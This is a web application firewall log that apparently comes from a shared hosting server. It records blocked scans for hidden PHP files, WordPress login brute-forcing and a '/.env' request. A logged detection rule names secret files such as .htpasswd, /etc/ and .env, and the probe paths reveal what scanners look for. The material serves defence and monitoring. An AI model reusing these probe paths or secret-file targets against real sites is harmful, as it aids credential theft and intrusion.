[Tue May 26 16:51:59.925677 2026] [security2:error] [pid 823496:tid 823685] [client 20.206.111.203:6028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cA3bHIkVhgP.php"] [unique_id "ahWCV5a08mrtyBNpA4PmrwAAADk"]
[Tue May 26 16:51:59.925849 2026] [security2:error] [pid 823496:tid 823685] [client 20.206.111.203:6028] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cA3bHIkVhgP.php"] [unique_id "ahWCV5a08mrtyBNpA4PmrwAAADk"]
[Tue May 26 16:51:59.954156 2026] [security2:error] [pid 823496:tid 823736] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCVpa08mrtyBNpA4PmlwAAAGw"]
[Tue May 26 16:51:59.965703 2026] [security2:error] [pid 823496:tid 823718] [client 20.151.130.61:65224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWCV5a08mrtyBNpA4PmsAAAAFo"]
[Tue May 26 16:51:59.965861 2026] [security2:error] [pid 823496:tid 823718] [client 20.151.130.61:65224] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/.well-known/about.php"] [unique_id "ahWCV5a08mrtyBNpA4PmsAAAAFo"]
[Tue May 26 16:52:00.228402 2026] [security2:error] [pid 823496:tid 823724] [client 20.151.130.61:65284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWCWJa08mrtyBNpA4PmtAAAAGA"]
[Tue May 26 16:52:00.228513 2026] [security2:error] [pid 823496:tid 823724] [client 20.151.130.61:65284] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWCWJa08mrtyBNpA4PmtAAAAGA"]
[Tue May 26 16:52:00.292790 2026] [security2:error] [pid 823496:tid 823719] [client 20.206.111.203:5964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/clas11.php"] [unique_id "ahWCWJa08mrtyBNpA4PmtQAAAFs"]
[Tue May 26 16:52:00.292901 2026] [security2:error] [pid 823496:tid 823719] [client 20.206.111.203:5964] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/clas11.php"] [unique_id "ahWCWJa08mrtyBNpA4PmtQAAAFs"]
[Tue May 26 16:52:00.461807 2026] [security2:error] [pid 823496:tid 823665] [client 20.151.130.61:64450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWCWJa08mrtyBNpA4PmvAAAACU"]
[Tue May 26 16:52:00.461983 2026] [security2:error] [pid 823496:tid 823665] [client 20.151.130.61:64450] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/bob.php"] [unique_id "ahWCWJa08mrtyBNpA4PmvAAAACU"]
[Tue May 26 16:52:00.609692 2026] [security2:error] [pid 823496:tid 823731] [client 20.151.130.61:65322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWCWJa08mrtyBNpA4PmvwAAAGc"]
[Tue May 26 16:52:00.609801 2026] [security2:error] [pid 823496:tid 823731] [client 20.151.130.61:65322] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/t3s.php"] [unique_id "ahWCWJa08mrtyBNpA4PmvwAAAGc"]
[Tue May 26 16:52:00.664929 2026] [security2:error] [pid 817651:tid 817800] [client 20.206.111.203:6062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cxl.php"] [unique_id "ahWCWNlGRCPPN1dS2y3DiQAAAJg"]
[Tue May 26 16:52:00.665024 2026] [security2:error] [pid 817651:tid 817800] [client 20.206.111.203:6062] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/cxl.php"] [unique_id "ahWCWNlGRCPPN1dS2y3DiQAAAJg"]
[Tue May 26 16:52:00.928445 2026] [security2:error] [pid 823496:tid 823711] [client 20.151.130.61:64573] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-admin/css/"] [unique_id "ahWCWJa08mrtyBNpA4PmxAAAAFM"]
[Tue May 26 16:52:00.937557 2026] [security2:error] [pid 817651:tid 817797] [client 20.63.34.22:12172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/tires.php"] [unique_id "ahWCWNlGRCPPN1dS2y3DjwAAAJU"]
[Tue May 26 16:52:00.937678 2026] [security2:error] [pid 817651:tid 817797] [client 20.63.34.22:12172] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/tires.php"] [unique_id "ahWCWNlGRCPPN1dS2y3DjwAAAJU"]
[Tue May 26 16:52:01.030233 2026] [security2:error] [pid 823496:tid 823639] [client 20.206.111.203:6142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahWCWZa08mrtyBNpA4PmxwAAAAs"]
[Tue May 26 16:52:01.030340 2026] [security2:error] [pid 823496:tid 823639] [client 20.206.111.203:6142] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahWCWZa08mrtyBNpA4PmxwAAAAs"]
[Tue May 26 16:52:01.046789 2026] [security2:error] [pid 823496:tid 823722] [client 20.151.130.61:65340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCWZa08mrtyBNpA4PmyAAAAF4"]
[Tue May 26 16:52:01.121598 2026] [security2:error] [pid 823496:tid 823725] [client 20.151.130.61:64573] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/x/"] [unique_id "ahWCWZa08mrtyBNpA4PmyQAAAGE"]
[Tue May 26 16:52:01.246422 2026] [security2:error] [pid 823496:tid 823703] [client 20.151.130.61:65340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCWZa08mrtyBNpA4PmywAAAEs"]
[Tue May 26 16:52:01.323907 2026] [security2:error] [pid 823496:tid 823672] [client 20.151.130.61:64573] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahWCWZa08mrtyBNpA4PmzwAAACw"]
[Tue May 26 16:52:01.426994 2026] [security2:error] [pid 823496:tid 823629] [client 20.151.130.61:65340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWCWZa08mrtyBNpA4Pm2AAAAAE"]
[Tue May 26 16:52:01.450277 2026] [security2:error] [pid 823496:tid 823741] [client 20.206.111.203:6050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/dtox.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm2QAAAHE"]
[Tue May 26 16:52:01.450370 2026] [security2:error] [pid 823496:tid 823741] [client 20.206.111.203:6050] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/dtox.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm2QAAAHE"]
[Tue May 26 16:52:01.499694 2026] [security2:error] [pid 823496:tid 823642] [client 20.151.130.61:64573] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm2wAAAA4"]
[Tue May 26 16:52:01.499880 2026] [security2:error] [pid 823496:tid 823642] [client 20.151.130.61:64573] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/uwu.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm2wAAAA4"]
[Tue May 26 16:52:01.538340 2026] [security2:error] [pid 817651:tid 817863] [client 62.60.130.233:56633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/wp-login.php"] [unique_id "ahWCWdlGRCPPN1dS2y3DkgAAANc"]
[Tue May 26 16:52:01.822160 2026] [security2:error] [pid 823496:tid 823685] [client 20.151.130.61:64541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm4wAAADk"]
[Tue May 26 16:52:01.822257 2026] [security2:error] [pid 823496:tid 823685] [client 20.151.130.61:64541] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/uwa.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm4wAAADk"]
[Tue May 26 16:52:01.839479 2026] [security2:error] [pid 823496:tid 823736] [client 20.206.111.203:6069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/eee.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm5AAAAGw"]
[Tue May 26 16:52:01.839588 2026] [security2:error] [pid 823496:tid 823736] [client 20.206.111.203:6069] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/eee.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm5AAAAGw"]
[Tue May 26 16:52:01.895416 2026] [security2:error] [pid 823496:tid 823630] [client 62.60.130.233:64141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/wp-login.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm5QAAAAI"], referer: https://www.bing.com/
[Tue May 26 16:52:02.226002 2026] [security2:error] [pid 823496:tid 823735] [client 20.206.111.203:5957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/5BltUjE9CrY.php"] [unique_id "ahWCWpa08mrtyBNpA4Pm7wAAAGs"]
[Tue May 26 16:52:02.226100 2026] [security2:error] [pid 823496:tid 823735] [client 20.206.111.203:5957] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/5BltUjE9CrY.php"] [unique_id "ahWCWpa08mrtyBNpA4Pm7wAAAGs"]
[Tue May 26 16:52:02.365409 2026] [security2:error] [pid 817651:tid 817852] [client 20.151.130.61:64551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWCWtlGRCPPN1dS2y3DmAAAAMw"]
[Tue May 26 16:52:02.365548 2026] [security2:error] [pid 817651:tid 817852] [client 20.151.130.61:64551] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWCWtlGRCPPN1dS2y3DmAAAAMw"]
[Tue May 26 16:52:02.567279 2026] [security2:error] [pid 823496:tid 823690] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCWZa08mrtyBNpA4Pm1wAAAD4"]
[Tue May 26 16:52:02.640875 2026] [security2:error] [pid 817651:tid 817813] [client 20.206.111.203:6040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/come.php"] [unique_id "ahWCWtlGRCPPN1dS2y3DmQAAAKU"]
[Tue May 26 16:52:02.640991 2026] [security2:error] [pid 817651:tid 817813] [client 20.206.111.203:6040] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/come.php"] [unique_id "ahWCWtlGRCPPN1dS2y3DmQAAAKU"]
[Tue May 26 16:52:02.840603 2026] [security2:error] [pid 823496:tid 823704] [client 20.151.130.61:65281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWCWpa08mrtyBNpA4Pm_AAAAEw"]
[Tue May 26 16:52:02.840757 2026] [security2:error] [pid 823496:tid 823704] [client 20.151.130.61:65281] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "ledao.com.mx.md-74.webhostbox.net"] [uri "/geforce.php"] [unique_id "ahWCWpa08mrtyBNpA4Pm_AAAAEw"]
[Tue May 26 16:52:02.851007 2026] [security2:error] [pid 817651:tid 817901] [client 20.63.34.22:12248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-block.php"] [unique_id "ahWCWtlGRCPPN1dS2y3DmwAAAP0"]
[Tue May 26 16:52:02.851093 2026] [security2:error] [pid 817651:tid 817901] [client 20.63.34.22:12248] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-block.php"] [unique_id "ahWCWtlGRCPPN1dS2y3DmwAAAP0"]
[Tue May 26 16:52:03.027034 2026] [security2:error] [pid 817651:tid 817827] [client 20.206.111.203:5982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/hg.php"] [unique_id "ahWCW9lGRCPPN1dS2y3DngAAALM"]
[Tue May 26 16:52:03.027146 2026] [security2:error] [pid 817651:tid 817827] [client 20.206.111.203:5982] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/hg.php"] [unique_id "ahWCW9lGRCPPN1dS2y3DngAAALM"]
[Tue May 26 16:52:03.424793 2026] [security2:error] [pid 823496:tid 823682] [client 20.206.111.203:5966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/aaa.php"] [unique_id "ahWCW5a08mrtyBNpA4PnBAAAADY"]
[Tue May 26 16:52:03.424896 2026] [security2:error] [pid 823496:tid 823682] [client 20.206.111.203:5966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.auto.redirefr.com.md-74.webhostbox.net"] [uri "/aaa.php"] [unique_id "ahWCW5a08mrtyBNpA4PnBAAAADY"]
[Tue May 26 16:52:03.595203 2026] [security2:error] [pid 823496:tid 823694] [client 194.5.82.117:49489] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.82.5.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWCWpa08mrtyBNpA4Pm_QAAAEI"]
[Tue May 26 16:52:03.712548 2026] [security2:error] [pid 823496:tid 823637] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCWpa08mrtyBNpA4Pm7gAAAAk"]
[Tue May 26 16:52:03.903256 2026] [security2:error] [pid 817651:tid 817810] [client 20.63.34.22:12261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-der.php"] [unique_id "ahWCW9lGRCPPN1dS2y3DowAAAKI"]
[Tue May 26 16:52:03.903406 2026] [security2:error] [pid 817651:tid 817810] [client 20.63.34.22:12261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/wp-der.php"] [unique_id "ahWCW9lGRCPPN1dS2y3DowAAAKI"]
[Tue May 26 16:52:04.932024 2026] [security2:error] [pid 823496:tid 823661] [client 194.5.82.160:26293] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWCXJa08mrtyBNpA4PnEwAAACE"]
[Tue May 26 16:52:05.090081 2026] [security2:error] [pid 823496:tid 823648] [client 20.63.34.22:12281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/ah25.php"] [unique_id "ahWCXZa08mrtyBNpA4PnGgAAABQ"]
[Tue May 26 16:52:05.090198 2026] [security2:error] [pid 823496:tid 823648] [client 20.63.34.22:12281] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/ah25.php"] [unique_id "ahWCXZa08mrtyBNpA4PnGgAAABQ"]
[Tue May 26 16:52:05.178451 2026] [security2:error] [pid 823496:tid 823736] [client 176.65.139.239:47930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "foresightbuildingsolutions.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWCXZa08mrtyBNpA4PnGwAAAGw"]
[Tue May 26 16:52:05.588446 2026] [security2:error] [pid 823496:tid 823749] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCXJa08mrtyBNpA4PnDAAAAHk"]
[Tue May 26 16:52:06.595269 2026] [security2:error] [pid 823496:tid 823709] [client 194.5.82.160:26293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.82.5.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "moes-art.com"] [uri "/site/wp-login.php"] [unique_id "ahWCXZa08mrtyBNpA4PnLQAAAFE"]
[Tue May 26 16:52:06.795696 2026] [security2:error] [pid 823496:tid 823660] [client 20.63.34.22:12177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.jhonweb.com"] [uri "/inputs.php"] [unique_id "ahWCXpa08mrtyBNpA4PnPAAAACA"]
